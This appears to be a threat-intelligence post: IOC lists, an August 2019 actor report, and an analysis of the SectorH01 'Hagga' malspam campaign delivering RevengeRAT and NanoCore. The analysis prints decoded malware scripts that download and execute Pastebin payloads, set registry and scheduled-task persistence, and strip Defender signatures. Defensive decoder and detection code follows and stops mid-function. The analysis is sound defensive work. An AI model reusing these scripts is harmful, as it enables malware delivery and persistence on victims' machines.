3996EFE9A3CF471A1F816287368FA0F99D2CDB95786530B0B61C7B9024FF717B

C2 Domains

pasta58[.]com
firewallsupports[.]com
microsofte-update[.]com

C2 IPs

217[.]79[.]183[.]33
176[.]9[.]235[.]101
213[.]202[.]217[.]31

MITRE ATT&CK Techniques

The following is a list of MITRE ATT&CK Techniques we have observed based on our analysis of these and other related malware.

Initial Access

T1190 Exploit Public-Facing Application

Execution

T1059 Command-Line Interface
T1106 Execution through API
T1086 PowerShell
T1053 Scheduled Task
T1064 Scripting
T1204 User Execution
T1061 Graphical User Interface
T1047 Windows Management Instrumentation

Persistence

T1060 Registry Run Keys / Startup Folder
T1053 Scheduled Task
T1100 Web Shell
T1078 Valid Accounts

Privilege Escalation

T1100 Web Shell
T1053 Scheduled Task
T1078 Valid Accounts

Defense Evasion

T1140 Deobfuscate/Decode Files or Information
T1202 Indirect Command Execution
T1112 Modify Registry
T1064 Scripting
T1480 Execution Guardrails
T1107 File Deletion
T1070 Indicator Removal on Host
T1078 Valid Accounts

Credential Access

T1110 Brute Force
T1003 Credential Dumping

Discovery

T1087 Account Discovery
T1482 Domain Trust Discovery
T1010 Application Window Discovery
T1083 File and Directory Discovery
T1046 Network Service Scanning
T1135 Network Share Discovery
T1057 Process Discovery
T1012 Query Registry
T1018 Remote System Discovery
T1082 System Information Discovery
T1033 System Owner/User Discovery

Lateral Movement

T1210 Exploitation of Remote Services
T1075 Pass the Hash
T1076 Remote Desktop Protocol
T1105 Remote File Copy
T1021 Remote Services
T1051 Shared Webroot
T1077 Windows Admin Shares

Collection

T1113 Screen Capture
T1005 Data from Local System
T1039 Data from Network Shared Drive

Command and Control

T1043 Commonly Used Port
T1094 Custom Command and Control Protocol
T1105 Remote File Copy
T1132 Data Encoding
T1001 Data Obfuscation
T1008 Fallback Channels
T1071 Standard Application Layer Protocol

Exfiltration

T1041 Exfiltration Over Command and Control Channel
T1048 Exfiltration Over Alternative Protocol
T1022 Data Encrypted
T1002 Data Compressed

Monthly Threat Actor Group Intelligence Report, August 2019

This is a summary of activity of suspected state sponsored Threat Actor Groups analyzed by the ThreatRecon Team, based on data and information collected from July 21 to August 20, 2019.

1. SectorA Activity Features

A total of four hacking groups, SectorA01, SectorA02, SectorA04 and SectorA07, were found among SectorA hacking groups this August. The two parallel requirements of the SectorA hacking groups are to collect high-quality information related to South Korean political and diplomatic activities and to obtain illegal monetary benefit from targets anywhere in the world.

SectorA01 group activity was found in South Korea, the Philippines, Argentina, Pakistan, the United States and Nepal. SectorA02 group activity was found in South Korea and the United States. The SectorA04 group, which had not been seen for a while, was found in South Korea, where malware was discovered using a digital signature issued by a Korean security company. SectorA07 group activity was found in South Korea, Indonesia, the United States, the Russian Federation and Germany.

The four SectorA hacking groups discovered in August all use spear phishing as an attack vector. However, SectorA01 uses Hangul (HWP) files as attachments in South Korea, while the SectorA02, SectorA04 and SectorA07 groups attach Microsoft Word files containing macros to their spear phishing emails.

The SectorA02 group produces mobile malware designed to run on Android smartphones and uses it for hacking activities.

The SectorA groups aim to seize high-level information related to South Korea's political and diplomatic activities and to North Korean relief organizations. Due to the large-scale economic sanctions surrounding SectorA, their hacking groups also steal financial information in other countries, including South Korea. These operations take place in parallel, and the SectorA groups are expected to continue hacking with both purposes.

2. SectorB Activity Features

A total of five SectorB hacking groups, SectorB01, SectorB03, SectorB04, SectorB06 and SectorB07, were found this August.

The hacking activity range of the SectorB01 group discovered so far has been the widest in the history of this hacking group. Their activity was found in Asia (including South Korea, Japan, Singapore, Vietnam, Malaysia, Hong Kong, Taiwan, Thailand, Myanmar, India), the Middle East (Turkey) and Africa (including South Africa), North America (including the United States and Canada) and Europe (including France, United Kingdom, Ireland, Germany, Switzerland, Netherlands, Italy, Czech republic, and Ukraine).

SectorB03 group activity was found in the United Arab Emirates, the United States, Japan and Taiwan.

SectorB04 group activity was found in Russian Federation, United States, United Kingdom, Turkey, Spain, South Korea, Malaysia and Taiwan.

The SectorB06 group has been found in the Russian Federation and Belarus.

SectorB07 group has been found in South Korea, Germany, United States and India.

Most of the SectorB hacking groups use Spear Phishing with document files as attachments to exploit vulnerabilities in Microsoft Office.

SectorB group’s hacking activities discovered in August are mostly concentrated in Asia, Europe and North America, and this is closely linked to its activities to obtain information about its country’s diplomatic and economic information related to an ongoing trade war with the United States.

3. SectorC Activity Features

Among the SectorC groups, the activities of three hacking groups, SectorC02, SectorC03 and SectorC08, were found this August.

The hacking activity of SectorC02 group has been found in Brazil, Georgia.

The hacking activity of SectorC03 group has been found in United States and United Kingdom.

The hacking activity of SectorC08 group has been found in Ukraine, United Kingdom, Belarus, Sweden, Argentina, United States and China.

The SectorC groups used different attack vectors. The SectorC02 group stole sensitive email information from Internet-facing internal Microsoft Exchange servers, while the SectorC03 and SectorC08 groups used spear phishing emails carrying malware as their primary technique, in line with their past activity.

However, the SectorC08 group has the characteristic of using 7ZipSfx compressed files as attachments to specific hacking targets.

The SectorC groups have many more attack techniques at their disposal than the threat actors of other groups because of their long history. Recently, they have been working to achieve the political objectives of their government, and this is expected to continue.

4. SectorD Activity Features

Among the SectorD groups, the activities of two hacking groups, SectorD02 and SectorD14, were found this August.

The hacking activity of SectorD02 group was found in Tajikistan and Uzbekistan.

The hacking activity of SectorD14 group has been found in Canada, United States, United Arab Emirates and Kuwait. In particular, the SectorD14 group conducted hacking activities on Industrial Control Systems (ICS) owned by government agencies, and natural gas and oil companies related to countries located in the Middle East, which may be related to a recent drone attack.

The basic hacking techniques of the SectorD groups are similar to those in the past, using a Microsoft Word file with a malicious macro as an attachment to a spear phishing email.

At the moment, diplomatic measures involving the SectorD group’s government are under way in Western countries, mainly in the United States, and the aforementioned physical attacks on oil fields in Saudi Arabia may soon lead to cyber wars with physical conflicts between the Middle East and Western countries.

5. SectorE Activity Features

Among the SectorE groups, the activities of three hacking groups, SectorE01, SectorE02 and SectorE04, were found this August.

The hacking activity of SectorE01 group was found in Poland, Germany and the United Kingdom.

The hacking activity of the SectorE02 group was found in Pakistan, the United Kingdom, the United States, Ukraine, the Netherlands and Germany.

The hacking activity of SectorE04 was found in China.

SectorE hacking groups have mainly been conducting hacking activities targeting countries that are politically competitive with SectorE group’s government, but the range of geographical hacking activities of these groups is gradually widening.

The hacking groups discovered in August mainly used spear phishing, attaching document files that exploited known Microsoft Word vulnerabilities or containing malicious macro code.

The SectorE groups are expanding their range of activity, and their recent activities have been found frequently in East Asia. In addition, it is highly likely that they will continue to develop new hacking techniques by copying techniques of other hacking groups or through their own research process.

6. SectorF Activity Features

August hacking activity of the SectorF01 group was found in Cambodia, China, South Korea, Japan, the United States, Ireland, the Russian Federation, and Australia. They used malware highly similar to that found in the past, and sent their targets spear phishing emails with document files containing malicious macro code attached.

In the past, their hacking activity has often been discovered in the Southeast Asia region, and recently their hacking activities have been carried out for the purpose of their country's economic development. The activity radius of this hacking group is expected to grow gradually, and continued analysis of their target areas and sectors is necessary.

7. Cyber Crime Activity Features

In August, a total of six hacking groups, SectorJ01, SectorJ04, SectorJ07, SectorJ10, SectorJ12 and SectorJ13, were found among the Cyber Crime Groups. Unlike other government-backed hacking groups, they collect information such as Credit Card information that can be monetized in the real world. They also hack organizations to spread ransomware on their internal network, or steal important industry secrets to sell them online.

The hacking activity of SectorJ01 group has been found in the Russian Federation, Romania, United Kingdom, Costa Rica and United States. The SectorJ01 Group is conducting hacking campaigns in Europe and North America this August. They collect various types of personal and corporate information that exists inside infected PCs from malware distributed through the spear phishing email.

The hacking activity of the SectorJ04 group has been found in the United Kingdom, United States, South Korea, Germany, Turkey, France, Bulgaria, Serbia, India, Canada, Argentina, Bangladesh and Hong Kong. They mainly hack into companies in various industries including transportation, universities, government agencies, manufacturing, semiconductors, online commerce, chemicals, and health. In the first half of 2019, they intensively hacked organizations in Asia, but their recent trend seems to be to move hacking activity back to Europe and North America.

The hacking activity of SectorJ07 group has been found in China, United States and Ukraine. They mainly produce malware that runs on Linux that can mine cryptocurrencies on high-performance servers utilized by companies.

The hacking activity of SectorJ10 group has been found in Philippines and United States. Attacks are carried out using spear phishing emails containing malware in the form of document files which have malicious macro code included inside. The macro calls to the Windows Management Instrumentation Command-line (WMIC), and the WMIC finally executes a malicious PowerShell script.

The SectorJ12 group conducted hacking activities targeting energy, entertainment, consulting and manufacturing companies located in France, Taiwan and Poland. The spear phishing emails have an ACE archive attached, which contains a Visual Basic Script (VBScript) that fetches the malicious PowerShell script from the attacker's server.

The hacking activity of the SectorJ13 group has been found in South Korea, Ukraine and the United Kingdom. They send spear phishing emails with document files containing malicious macro code attached. When the Word document is opened, the macro downloads additional malware from the attacker's server by running PowerShell. SectorJ13 was previously active only in Europe, but its activity was recently found in South Korea as well. This group needs to be watched closely if it is targeting South Korea with similar intent and purpose as the SectorJ04 group.


The full report detailing each event together with IoCs (Indicators of Compromise) and recommendations is available to existing NSHC ThreatRecon customers. For more information, please contact RA.global@nshc.net.

Hagga of SectorH01 continues abusing Bitly, Blogger and Pastebin to deliver RevengeRAT and NanoCore

Overview

“Hagga” is the username of a Pastebin account used since December last year by a pervasive known group of threat actors which targets thousands of users around the world both for cyber espionage and cyber crime purposes using malspam. Their activities were first discovered in 2017, and the ThreatRecon Team tracks both this group and the members behind “Hagga” collectively as the SectorH01 group.

Since their activities were first discovered, they have been observed using a variety of commodity malware spread from the same hosts and communicating with the same C2 addresses. The commodity malware used in the past includes RevengeRAT and NanoCore, both of which they still use today.

SectorH01 Group Attack Lifecycle

Their Targeting

Sectors the SectorH01 group has been observed targeting since discovery, likely for intelligence purposes:

  • Defense
  • Dissidents
  • Governments
  • Military

Sectors the SectorH01 group has been observed targeting since discovery, likely for criminal purposes:

  • Agriculture
  • Food
  • Hospitality
  • Manufacturing
  • News Media
  • Shipping
  • Tourism
  • Trade

Countries the SectorH01 group has been observed targeting for this event:

  • United States
  • United Kingdom
  • Latvia
  • France
  • Germany
  • India
  • Japan
  • South Korea
  • Taiwan
  • Thailand
  • Turkey
  • Vietnam

The malware in this blog post appears to have been used only for criminal activity, from June to September, against enterprise users, the majority of whom are based in the United States.

The Phish

SectorH01 group sends phishing emails to their targets with subjects related to payments, such as purchase orders, invoices, request for quotations, telegraphic transfer confirmation documents, or overdue payments. In these emails, they attach file(s) related to the email contents in the form of Excel XLS, Microsoft Word DOC/DOCX, RTF, and ZIP files.

Sample Excel File (b4fdff7dbed8724bde2c097285ce5842373a3d5087f0d492479e62b48e3e5e2d)

In the case of Excel XLS files, they have in recent months been using simply obfuscated VBA macros which execute mshta.exe against a Bitly shortened link that redirects to a Google Blogger (blogspot) page.

VBA Macro which executes mshta.exe embedded in malicious XLS file

The Blogger page looks benign but has obfuscated JavaScript hidden in its source code. The same JavaScript obfuscation pattern is used extensively not only on the Blogger page but also on Pastebin, where it is stacked over multiple layers and eventually decodes to various VBScript scripts that are run by the mshta.exe utility.

SectorH01 commonly uses multiple layers of the same encoding for its Pastebin scripts

By performing the same decoding on the JavaScript code, we get the VBScript, which performs multiple tasks such as terminating processes and setting persistence.

Example Decoded Script
<script language="VBScript">
' Kill the Office processes that hosted the lure document
Set X7W832DSA = CreateObject(StrReverse(StrReverse("WScript.Shell")))
Dim ASSd712ji8asd
ASSd712ji8asd = "cmd.exe /c taskkill /f /im winword.exe & taskkill /f /im excel.exe & taskkill /f /im MSPUB.exe & taskkill /f /im POWERPNT.EXE & exit"
X7W832DSA.Run ASSd712ji8asd, vbHide
' HKCU Run key persistence: mshta.exe pointed at a Pastebin raw URL
Set X_ws = CreateObject("WScript.Shell")
Pa_2da = "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\WinUpdate"
X_ws.RegWrite Pa_2da, "mshta.exe http://pastebin.com/raw/2gY9SAwU", "REG_EXPAND_SZ"
' Scheduled task "Avast Updater" every 30 minutes; the schtasks string is reversed and the URL is split character by character
Set Mi_G = CreateObject(StrReverse(StrReverse("WScript.Shell")))
Dim X_hw
X_hw0 = StrReverse("t/ 03 om/ ETUNIM cs/ etaerc/ sksathcs")
X_hw1 = "n ""Avast Updater"" /tr ""mshta.ex"
X_hw2 = "e h" + "t" + "t" + "p" + ":" + "/" + "/" + "p" + "a" + "s" + "t" + "e" + "b" + "i" + "n" + "." + "c" + "o" + "m" + "/" + "r" + "a" + "w" + "/qZXnhtQG"" /F "
X_hw = X_hw0 + X_hw1 + X_hw2
Mi_G.Run X_hw, vbHide
' Second scheduled task "Avast backup" every 300 minutes, built the same way
Set Ox_xw = CreateObject(StrReverse(StrReverse("WScript.Shell")))
Dim P_wx
P_wx0 = StrReverse("t/ 003 om/ ETUNIM cs/ etaerc/ sksathcs")
P_wx1 = "n ""Avast backup"" /tr ""mshta.ex"
P_wx2 = "e h" + "t" + "t" + "p" + ":" + "/" + "/" + "p" + "a" + "s" + "t" + "e" + "b" + "i" + "n" + "." + "c" + "o" + "m" + "/" + "r" + "a" + "w" + "/Htp0LKHg"" /F "
P_wx = P_wx0 + P_wx1 + P_wx2
Ox_xw.Run P_wx, vbHide
self.close
</script>

Going into one of the scheduled tasks, we see more encoded text.

Example First-Layer Decoded Scheduled Task
<script language="VBScript">
Set EAsxw = CreateObject(StrReverse("llehS.tpircSW"))
Dim Xsks
' Reversed PowerShell: a byte array rebuilt with ASCII.GetString and piped to IEX
Xsks = StrReverse("XEI|)OLOL$(gnirtSteG.IICSA::]gnidocnE.txeT.metsyS[;)14,201,63,44,93,101,021,101,64,001,801,501,711,66,38,77,93,04,101,021,101,85,85,39,211,711,611,501,701,99,79,27,64,701,19,95,88,96,37,421,14,93,021,84,93,44,93,33,46,53,93,04,101,99,79,801,211,101,411,64,14,93,84,67,88,68,711,35,101,84,74,911,79,411,74,901,111,99,64,011,501,89,101,611,511,79,211,74,74,85,511,211,611,611,401,93,44,001,111,401,611,101,77,85,85,39,101,211,121,48,801,801,79,76,64,99,501,511,79,66,801,79,711,511,501,68,64,611,201,111,511,111,411,99,501,77,19,44,93,301,011,501,411,611,38,001,79,111,801,011,911,111,86,93,44,14,611,011,101,501,801,76,89,101,78,64,611,101,87,23,611,99,101,601,89,97,54,911,101,87,04,04,101,901,79,011,121,66,801,801,79,76,85,85,39,011,111,501,611,99,79,411,101,611,011,37,64,99,501,511,79,66,801,79,711,511,501,68,64,611,201,111,511,111,411,99,501,77,19,16,201,63,39,39,19,101,611,121,66,19,95,88,96,37,421,14,93,98,27,121,711,17,56,15,94,74,911,79,411,74,901,111,99,64,011,501,89,101,611,511,79,211,74,74,85,511,211,611,611,401,93,44,001,111,401,611,101,77,85,85,39,101,211,121,48,801,801,79,76,64,99,501,511,79,66,801,79,711,511,501,68,64,611,201,111,511,111,411,99,501,77,19,44,93,301,011,501,411,611,38,001,79,111,801,011,911,111,86,93,44,14,611,011,101,501,801,76,89,101,78,64,611,101,87,23,611,99,101,601,89,97,54,911,101,87,04,04,101,901,79,011,121,66,801,801,79,76,85,85,39,011,111,501,611,99,79,411,101,611,011,37,64,99,501,511,79,66,801,79,711,511,501,68,64,611,201,111,511,111,411,99,501,77,19,16,601,201,63,95,14,93,99,501,511,79,66,801,79,711,511,501,68,64,611,201,111,511,111,411,99,501,77,93,04,101,901,79,87,801,79,501,611,411,79,08,401,611,501,78,001,79,111,67,85,85,39,121,801,89,901,101,511,511,56,64,011,111,501,611,99,101,801,201,101,28,64,901,101,611,511,121,38,19,23,39,001,501,111,811,19(@=OLOL$")
' "Powershell.exe " assembled one character at a time through redundant StrReverse calls
X_WRc = StrReverse("P") + StrReverse("o") + StrReverse("w") + StrReverse(StrReverse(StrReverse(StrReverse("e")))) + StrReverse("r") + StrReverse("s") + StrReverse("h") + StrReverse(StrReverse(StrReverse(StrReverse("e")))) + StrReverse(StrReverse("l")) + StrReverse(StrReverse("l")) + StrReverse(".") + StrReverse(StrReverse(StrReverse(StrReverse("e")))) + StrReverse("x") + StrReverse(StrReverse(StrReverse(StrReverse("e")))) + Space(1) + Xsks
EAsxw.Run X_WRc, vbHide
self.close
</script>

Finally, further decoding shows it loading different malware from two Pastebin sites, which are again obfuscated.

Example Second-Layer Decoded Scheduled Task
[void] [System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');
# first paste: the code injector assembly, handed to IEX
$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://pastebin.com/raw/13AGuyHY')|IEX;
# second paste: NanoCore bytes, with the '#@!' marker swapped back to '0x' before evaluation
[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://pastebin.com/raw/0e5uVXL0').replace('#@!','0x')|IEX;
# the injector runs the payload inside a spawned MSBuild.exe
[k.Hackitup]::exe('MSBuild.exe',$f)

At other times, the decoded scripts will make use of .NET Reflection

Example of .NET Reflection in Decoded Script
# wait for connectivity before pulling the pastes
do {$ping = test-connection -comp google.com -count 1 -Quiet} until ($ping);
[void] [System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');
$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://pastebin.com/raw/QppWFhGC')|IEX;
[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://pastebin.com/raw/Q8g1d6Be').replace(')&*^','0x')|IEX;
$obj =@('MSBuild.exe',$f);
# locate the injector's type and method by name via reflection and invoke them
$g22=$a.GetType('THC452563sdfdsdfgr4777cxg04477fsdf810df777');
$y=$g22.GetMethod('retrt477fdg145fd4g0wewerwedsa799221dsad4154qwe');
$j=[Activator]::CreateInstance($g22,$null);
$y.Invoke($j,$obj)
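The StrReverse, piecewise "+" concatenation and byte-array layers shown above can be unwound mechanically. The following Python decoder is an added example, not ThreatRecon tooling or code from the pastes: it evaluates the small subset of VBScript these scripts use (StrReverse, Space, "+" concatenation, "" quote escapes, variable references), follows the assignments up to the WScript.Shell .Run call, and then expands the $LOL=@(...) array into the text handed to IEX. It runs against a constructed stand-in paste whose payload is a harmless Write-Output, not the original Pastebin content.

```python
"""Decoder for the VBScript string-hiding layers used in the SectorH01 pastes.
Added example; the sample paste below is constructed, not the real one."""
import re


def _split_plus(expr):
    """Split a VBScript expression on '+' that sits outside double quotes."""
    parts, buf, in_quote = [], [], False
    for ch in expr:
        if ch == '"':
            in_quote = not in_quote
        if ch == "+" and not in_quote:
            parts.append("".join(buf))
            buf = []
        else:
            buf.append(ch)
    parts.append("".join(buf))
    return [p.strip() for p in parts if p.strip()]


def vb_eval(expr, variables=None):
    """Evaluate the subset of VBScript string syntax these scripts use:
    "literal" (with "" as an escaped quote), StrReverse(x), Space(n),
    a previously assigned variable name, and '+' concatenation."""
    variables = variables or {}
    terms = _split_plus(expr)
    if not terms:
        return ""
    if len(terms) > 1:
        return "".join(vb_eval(t, variables) for t in terms)
    t = terms[0]
    if len(t) >= 2 and t[0] == '"' and t[-1] == '"':
        return t[1:-1].replace('""', '"')
    m = re.fullmatch(r"StrReverse\((.*)\)", t, re.S)
    if m:
        return vb_eval(m.group(1), variables)[::-1]  # every nesting level reverses again
    m = re.fullmatch(r"Space\((\d+)\)", t)
    if m:
        return " " * int(m.group(1))
    if t in variables:
        return variables[t]
    raise ValueError("unsupported VBScript term: " + t[:40])


def decode_char_array(powershell):
    """Recover the text that $X=@(n,n,...);[...]::ASCII.GetString($X)|IEX
    hands to Invoke-Expression."""
    m = re.search(r"@\(\s*([\d\s,]+?)\s*\)", powershell)
    if not m:
        raise ValueError("no byte array in PowerShell command")
    codes = [int(x) for x in m.group(1).split(",") if x.strip()]
    return bytes(codes).decode("ascii")


def decode_paste(vb_source):
    """Evaluate the assignments of a first-layer paste in order and return
    (command passed to WScript.Shell.Run, text the byte array expands to)."""
    variables, run_cmd = {}, None
    for line in vb_source.splitlines():
        line = line.strip()
        m = re.match(r"(\w+)\s*=\s*(.+)$", line)
        if m and not line.startswith("Set "):
            variables[m.group(1)] = vb_eval(m.group(2), variables)
        m = re.match(r"\w+\.Run\s+(\w+)", line)
        if m:
            run_cmd = variables[m.group(1)]
    if run_cmd is None:
        raise ValueError("no .Run call found")
    return run_cmd, decode_char_array(run_cmd)


def build_sample_paste():
    """Constructed stand-in for the first-layer scheduled-task paste: same
    encoding shape, but the payload is a harmless Write-Output."""
    payload = 'Write-Output "decoded payload"'
    ps = ("$LOL=@(" + ",".join(str(ord(c)) for c in payload)
          + ");[System.Text.Encoding]::ASCII.GetString($LOL)|IEX")
    return "\n".join([
        'Set EAsxw = CreateObject(StrReverse("llehS.tpircSW"))',
        "Dim Xsks",
        'Xsks = StrReverse("' + ps[::-1] + '")',
        'X_WRc = StrReverse("P") + StrReverse("o") + StrReverse("w") + '
        'StrReverse(StrReverse(StrReverse(StrReverse("e")))) + StrReverse("r") + '
        'StrReverse("s") + StrReverse("h") + StrReverse("e") + "ll." + '
        'StrReverse("exe") + Space(1) + Xsks',
        "EAsxw.Run X_WRc, vbHide",
        "self.close",
    ])


if __name__ == "__main__":
    cmd, inner = decode_paste(build_sample_paste())
    print("Run command :", cmd[:60] + "...")
    print("IEX payload :", inner)
```

The same vb_eval handles the schtasks builder from the earlier script: the reversed "t/ 03 om/ ETUNIM cs/ etaerc/ sksathcs" plus its character-by-character URL pieces evaluates to the full schtasks /create command line.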

After looking at the various scripts used, we observed these obfuscated JavaScript code mainly serving one or more of these purposes:

  • Terminating Microsoft Office processes winword.exe, excel.exe, MSPUB.exe, POWERPNT.exe, and sometimes Windows Defender processes MSASCuiL.exe and MpCmdRun.exe
  • Interfering with Windows Defender via command “MpCmdRun.exe -removedefinitions -dynamicsignatures”
  • Setting Registry Autorun Persistence to execute mshta.exe on a Pastebin url
  • Setting Scheduled Task Persistence to execute mshta.exe on a Pastebin url
  • Executing malware in memory, sometimes in Microsoft’s .NET MSBuild.exe

In most cases, the SectorH01 group in fact performed all of the above, sometimes by stacking multiple Pastebin URLs and multiple commands in a single paste. Moreover, since the SectorH01 group controls the "Hagga" Pastebin account, which can edit its own pastes, they at times modify a paste to perform different actions. Below is the attack flow using this sample Excel file as an example.

Site: www[.]bitly[.]com/adsodeasda
Action: Redirect to https://xasjow21d[.]blogspot.com/p/14[.]html

Site: https://xasjow21d[.]blogspot.com/p/14[.]html
Action: mshta.exe http://www[.]pastebin[.]com/raw/8uJavttD

Site: http://www[.]pastebin[.]com/raw/8uJavttD
Action: (1) MpCmdRun.exe -removedefinitions -dynamicsignatures
        (2) taskkill winword.exe / excel.exe / MSPUB.exe / POWERPNT.exe / MSASCuiL.exe / MpCmdRun.exe
        (3) Run https://pastebin[.]com/raw/7EdEuebH via PowerShell
        (4) Run http://pastebin[.]com/raw/ri21rHbF via mshta.exe

Site: http://pastebin[.]com/raw/ri21rHbF
Action: Deobfuscates to RevengeRAT (CF6293824C97C45680CF999955FD48801856B424DC6E3CEAC6D5E36BB4092856)

Site: http://pastebin[.]com/raw/ri21rHbF [Paste Edit 1]
Action: (1) taskkill winword.exe / excel.exe / MSPUB.exe / POWERPNT.exe
        (2) Set Registry Autorun Persistence to execute mshta.exe http://pastebin[.]com/raw/2gY9SAwU
        (3) Set Scheduled Task Persistence to execute mshta.exe http://pastebin[.]com/raw/qZXnhtQG
        (4) Set Scheduled Task Persistence to execute mshta.exe http://pastebin[.]com/raw/Htp0LKHg

Site: http://pastebin[.]com/raw/ri21rHbF [Paste Edit 2]
Action: (1) ping Google
        (2) Run https://pastebin[.]com/raw/QppWFhGC via Reflection
        (3) Run https://pastebin[.]com/raw/Q8g1d6Be, replace(')&*^','0x'), via Reflection

Site: http://pastebin[.]com/raw/2gY9SAwU
Action: Self.close()

Site: http://pastebin[.]com/raw/qZXnhtQG
Action: (1) Execute https://pastebin[.]com/raw/13AGuyHY via Reflection
        (2) Execute k.Hackitup() in https://pastebin[.]com/raw/0e5uVXL0, replace('#@!','0x'), via Reflection

Site: http://pastebin[.]com/raw/Htp0LKHg
Action: Self.close()

Site: https://pastebin[.]com/raw/QppWFhGC
Action: Deobfuscates to a code injector (E22D550423F05EB685AD060A71D58B306E31C473D2D0CACF5794EC424FD3F393), obfuscated with ConfuserEx

Site: https://pastebin[.]com/raw/Q8g1d6Be
Action: Deobfuscates to NanoCore (E841F0008D9DA41CD815F75657D305DD69FC169C64FA283BF62DECD02B3D931E), obfuscated with Eazfuscator

Site: https://pastebin[.]com/raw/13AGuyHY
Action: Deobfuscates to a code injector (84833991F1705A01A11149C9D037C8379A9C2D463DC30A2FEC27BFA52D218FA6), obfuscated with ConfuserEx

Site: https://pastebin[.]com/raw/0e5uVXL0
Action: Deobfuscates to NanoCore (94B7C5C65637D33F031F1173A68C1D008DD948B6CCBAE42682F82A56D3CF6197), obfuscated with Eazfuscator

Using bit.ly, blogspot and pastebin lets the SectorH01 group stay less traceable on the infrastructure side, but it is precisely because of this that we know their pastes center around the "hagga" user these days. As long as Pastebin tolerates this user, they are likely to keep using the account, because Pastebin Pro accounts are no longer for sale.

But as pastes can easily be removed following abuse reports, the SectorH01 group hedges its risk by connecting to multiple unlisted pastes. We see the same hedging on their target endpoints, where they set multiple layers of persistence, use more than one type of RAT at the initial stage, and connect to multiple servers.

RevengeRAT

RevengeRAT is a RAT which has its malware builder and source code publicly available. It is set to use the C2 address ontothenextone[.]duckdns[.]org.

Some of the configuration settings of this RevengeRAT variant

RevengeRAT uses Base64 encoding for its C2 traffic, and this information is easily decoded. From the configuration settings, we see the key variable "Revenge-RAT" and the SPL variable "-]NK[-", both of which are used as delimiters between the Base64 encoded data.

Information sent to the C2 in a past packet capture of this sample which can be easily decoded
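As an added example, not tooling from the original post, the following Python decodes a captured RevengeRAT stream under the assumption that each message is a run of Base64 fields separated by the SPL string "-]NK[-" and closed by the key string "Revenge-RAT". The sample stream, its field contents and the trailing partial message are constructed for illustration and do not reproduce the real beacon schema.

```python
"""RevengeRAT C2 stream decoder. Added example; delimiter layout assumed from
the configuration values in the post, sample traffic constructed."""
import base64
import binascii

KEY = b"Revenge-RAT"   # 'key' value from the sample's configuration
SPL = b"-]NK[-"        # 'SPL' value from the sample's configuration


def build_message(fields):
    """Constructed encoder for the assumed layout: Base64 fields joined by
    SPL, with KEY closing the message."""
    return SPL.join(base64.b64encode(f.encode("utf-8")) for f in fields) + KEY


def decode_field(token):
    """Base64-decode one field; anything that is not valid Base64 is kept
    verbatim and flagged instead of aborting the whole capture."""
    try:
        return base64.b64decode(token, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return "<not-base64:%s>" % token.decode("latin-1")


def parse_stream(buf):
    """Split a captured C2 byte stream into messages. Returns the list of
    decoded field lists and the unterminated tail (a message still in flight,
    to be prepended to the next chunk read from the socket)."""
    *complete, tail = buf.split(KEY)
    messages = [[decode_field(t) for t in m.split(SPL)] for m in complete if m]
    return messages, tail


SAMPLE_STREAM = (  # constructed capture: two full messages plus a partial one
    build_message(["Info", "WIN-EXAMPLE / analyst", "Windows 10 Pro", "x64"])
    + build_message(["Ping"])
    + b"QWxpdmU="
)

if __name__ == "__main__":
    msgs, rest = parse_stream(SAMPLE_STREAM)
    for m in msgs:
        print(" | ".join(m))
    print("buffered tail:", rest)
```

Neither delimiter can collide with Base64 output (the Base64 alphabet contains no "-", "[" or "]"), which is why a plain split is safe here; the tail handling matters when reassembling from packet captures, where a message can straddle two TCP segments.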

NanoCore

NanoCore is a RAT which was available for sale from 2014 to 2016 and has been leaked over the years. While the developer of NanoCore was arrested and sentenced last year [1], the RAT is still used by attackers.

In this case, the two NanoCore samples we found encoded on Pastebin attempted to connect to the C2 addresses attilabanks[.]ddns[.]net and yakka[.]duckdns[.]org. The C2 traffic of NanoCore is known to use the DES algorithm for encryption.

Summary

SectorH01 is a threat group which in most cases targets enterprise users seemingly indiscriminately; even when they target for espionage, their TTPs have been known to stay fairly constant. They remain brazen in their attacks, and although we see a slight improvement in their operational security, they still use relatively simple tricks such as macros and known, detected RATs (loaded in memory only), and connect to domains such as Pastebin and dynamic DNS services that should raise red flags or at least questions. All of these are opportunities for organizations to detect the SectorH01 group.
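The behaviours summarised in this post map onto a handful of process-creation and registry events. The following Python is an added example, not part of the original post, of detection logic run over constructed Sysmon-style records (EventID 1 process creation with Image, ParentImage and CommandLine; EventID 13 registry value set with TargetObject and Details) that mirror the attack flow table above. The field names follow Sysmon; the records themselves, including the SID, are made up.

```python
"""Detection checks for the SectorH01 behaviours described in this post,
run over constructed Sysmon-style records. Added example; field names
follow Sysmon, the records are constructed to mirror the attack flow."""
import re
from pathlib import PureWindowsPath

OFFICE_HOSTS = {"winword.exe", "excel.exe", "powerpnt.exe", "mspub.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "mshta.exe", "wscript.exe", "cscript.exe"}
PASTEBIN_RAW = re.compile(r"https?://(www\.)?pastebin\.com/raw/\S+", re.I)


def base(path):
    """Lower-cased file name of a Windows path (works on any host OS)."""
    return PureWindowsPath(path).name.lower()


def rules_for(ev):
    """Names of every rule a single event satisfies (empty list if benign)."""
    hits = []
    if ev["EventID"] == 1:                       # process creation
        img = base(ev["Image"])
        parent = base(ev.get("ParentImage", ""))
        cl = ev["CommandLine"]
        if img == "mshta.exe" and PASTEBIN_RAW.search(cl):
            hits.append("mshta_loads_pastebin_raw")
        if img == "mshta.exe" and parent in OFFICE_HOSTS:
            hits.append("office_spawned_mshta")
        if img == "schtasks.exe" and "/create" in cl.lower() and "mshta" in cl.lower():
            hits.append("schtasks_mshta_persistence")
        if img == "mpcmdrun.exe" and "-removedefinitions" in cl.lower():
            hits.append("defender_definitions_removed")
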